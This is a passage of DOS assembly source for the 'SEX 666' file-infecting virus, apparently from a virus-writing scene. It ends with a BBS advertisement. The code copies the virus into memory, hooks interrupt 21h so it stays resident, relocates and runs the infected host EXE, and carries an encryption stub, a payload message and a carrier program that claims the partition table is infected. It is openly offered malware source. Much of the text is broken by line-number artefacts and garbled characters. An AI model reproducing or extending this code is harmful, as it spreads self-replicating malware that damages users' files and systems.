push dx
|
|||
|
xor si,si ; copy virus to memory-block
|
|||
|
xor di,di
|
|||
|
mov cx,VirusSize/2
|
|||
|
cld
|
|||
|
rep movsw
|
|||
|
xor ax,ax ; ds = interrupt table
|
|||
|
mov ds,ax
|
|||
|
mov ax,ds:Int21o ; save interrupt 21h vector
|
|||
|
mov es:OldInt21o,ax
|
|||
|
mov ax,ds:Int21s
|
|||
|
mov es:OldInt21s,ax
|
|||
|
mov ds:Int21o,offset Interrupt21 ; store new interrupt vector
|
|||
|
mov ds:Int21s,es
|
|||
|
mov es:Handle1,0 ; clear handles
|
|||
|
mov es:Handle2,0
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov ax,cs ; ax=distenation segment
|
|||
|
mov dx,cs ; dx=segment of orginal header
|
|||
|
add dx,VirusSize/10h
|
|||
|
retf ; start orginal exe-file
|
|||
|
|
|||
|
Continue:
|
|||
|
mov ds,dx ; ds=dx
|
|||
|
add ExeSS,ax ; adjust orginal SS
|
|||
|
add ExeCS,ax ; adjust orginal CS
|
|||
|
xor si,si ; copy orginal header to
|
|||
|
xor di,di ; code segment
|
|||
|
mov cx,0dh
|
|||
|
cld
|
|||
|
rep movsw
|
|||
|
mov si,ReloOffset ; get offset of relocationtable
|
|||
|
mov cx,ReloCount ; get number of relocationitems
|
|||
|
add dx,HeaderSize ; get start of orginal exe-file
|
|||
|
cld
|
|||
|
jcxz Zero ; 0 relocation items ?
|
|||
|
Next: push ax ; save ax
|
|||
|
lodsw ; get offset of relocationitem
|
|||
|
mov bx,ax
|
|||
|
lodsw ; get segment of relocationitem
|
|||
|
add ax,dx
|
|||
|
mov es,ax
|
|||
|
pop ax
|
|||
|
add es:[bx],ax ; adjust relocationitem
|
|||
|
loop Next ; next relocationitem
|
|||
|
Zero: mov bx,PageCount ; get number of pages in file
|
|||
|
cli ; disable interrupts
|
|||
|
NxtPage:mov ds,dx ; ds = source segment
|
|||
|
mov es,ax ; es = destenation segment
|
|||
|
mov cx,100h ; cx = size of 1 page in words
|
|||
|
xor si,si ; si = 0
|
|||
|
xor di,di ; di = 0
|
|||
|
rep movsw ; copy block
|
|||
|
add ax,20h ; adjust destenation segment
|
|||
|
add dx,20h ; adjust source segment
|
|||
|
dec bx ; restore cx
|
|||
|
jnz NxtPage ; next block
|
|||
|
mov ss,cs:ExeSS ; set ss:sp
|
|||
|
mov sp,cs:ExeSP
|
|||
|
sti ; enable interrupts
|
|||
|
mov ax,cs:SavedAX ; restore registers
|
|||
|
mov ds,cs:SavedDS
|
|||
|
mov es,cs:SavedDS
|
|||
|
jmp cs:ExeEntry
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Activation
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Message equ this byte
|
|||
|
db 9,9,9,9,' SEX 666',13,10
|
|||
|
db 9,9,9,9,' Fuck the Demon',13,10
|
|||
|
db 13,10
|
|||
|
db 9,9,9,9,' Greetings Bit Addict',13,10
|
|||
|
|
|||
|
TextLine equ this byte
|
|||
|
db 13,10
|
|||
|
db 9,9,9,9,'<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',13,10
|
|||
|
db 13,10
|
|||
|
db '$'
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Encryption
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Crypt: db 58 dup(90h) ; this should be the encryption
|
|||
|
|
|||
|
Cryptor dw 0 ; change the encryption by
|
|||
|
; changing this value
|
|||
|
|
|||
|
Main: call Crypt ; decrypt
|
|||
|
jmp Start ; jump to Start
|
|||
|
|
|||
|
|
|||
|
LastByte equ $ ; encryption stops here
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Variables
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
OldInt1C equ this dword ; orginal interrupt 8
|
|||
|
OldInt1Co dw 0
|
|||
|
OldInt1Cs dw 0
|
|||
|
OldInt21 equ this dword ; orginal interrupt 21h
|
|||
|
OldInt21o dw 0
|
|||
|
OldInt21s dw 0
|
|||
|
|
|||
|
Disable db 0
|
|||
|
|
|||
|
Count equ this word ; timer count
|
|||
|
SavedAX dw 0
|
|||
|
SavedDS dw 0
|
|||
|
|
|||
|
Handle1 dw -1 ; Handle of exe-file created
|
|||
|
Handle2 dw -1 ; Handle of exe-file opend
|
|||
|
|
|||
|
Table dw 0,0,0,0 ; Used by link
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Orginal EXE-file
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
org VirusSize
|
|||
|
|
|||
|
db 'MZ' ; header
|
|||
|
dw 0 ; image size = 1024 bytes
|
|||
|
dw 4
|
|||
|
dw 0 ; relocation items = 0
|
|||
|
dw 2 ; headersize = 20h
|
|||
|
dw 40h ; minimum memory
|
|||
|
dw 40h ; maximum memory
|
|||
|
dw 0 ; ss
|
|||
|
dw 400h ; sp
|
|||
|
dw 0 ; chksum
|
|||
|
dw 0 ; ip
|
|||
|
dw 0 ; cs
|
|||
|
dw 1ch ; offset relocation table
|
|||
|
dw 0 ; overlay number
|
|||
|
dw -1
|
|||
|
dw -1
|
|||
|
|
|||
|
Orginal:mov ah,9 ; display warning
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov dx,offset Warning-VirusSize-20h
|
|||
|
int 21h
|
|||
|
mov ax,4c00h
|
|||
|
int 21h ; terminate
|
|||
|
|
|||
|
Warning equ this byte
|
|||
|
|
|||
|
db 13,10
|
|||
|
db 'WARNING:',13,10
|
|||
|
db 13,10
|
|||
|
db 'SEX 666 virus is now memory resident and has now infected the',13,10
|
|||
|
db 'partition table !!!!!',13,10
|
|||
|
db 13,10
|
|||
|
db '$'
|
|||
|
|
|||
|
cseg ends
|
|||
|
|
|||
|
sseg segment stack 'stack'
|
|||
|
db 100h dup(?)
|
|||
|
sseg ends
|
|||
|
|
|||
|
end Start
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|